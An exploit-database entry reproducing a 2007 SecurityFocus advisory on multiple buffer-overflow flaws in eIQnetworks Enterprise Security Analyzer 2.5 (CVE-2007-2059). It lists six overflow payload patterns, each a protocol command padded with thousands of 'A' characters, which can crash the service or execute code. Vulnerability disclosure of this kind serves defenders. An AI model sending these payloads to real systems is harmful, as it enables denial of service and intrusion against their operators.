eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities

Author: Leon Juranic
type: dos
platform: windows
port: 
date_added: 2007-04-12  
date_updated: 2013-11-27  
verified: 1  
codes: CVE-2007-2059;OSVDB-34920  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29850.txt  

source: https://www.securityfocus.com/bid/23454/info

eIQnetworks Enterprise Security Analyzer is prone to multiple buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

Exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Enterprise Security Analyzer 2.5 is reported vulnerable; other versions may also be affected.

- DELETESEARCHFOLDER : [DELETESEARCHFOLDER&A x 40000...&]
- DELTASK: [DELTASK&A x 3000...&current&test&]
- HMGR_CHECKHOSTSCSV: [ HMGR_CHECKHOSTSCSV&A x 80000...&]
- TASKUPDATEDUSER: [TASKUPDATEDUSER&A x 60000...&test&test&]
- VERIFYUSERKEY: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345]
- VERIFYPWD: [VERIFYPWD&A x 6000...&admin&adminpass&]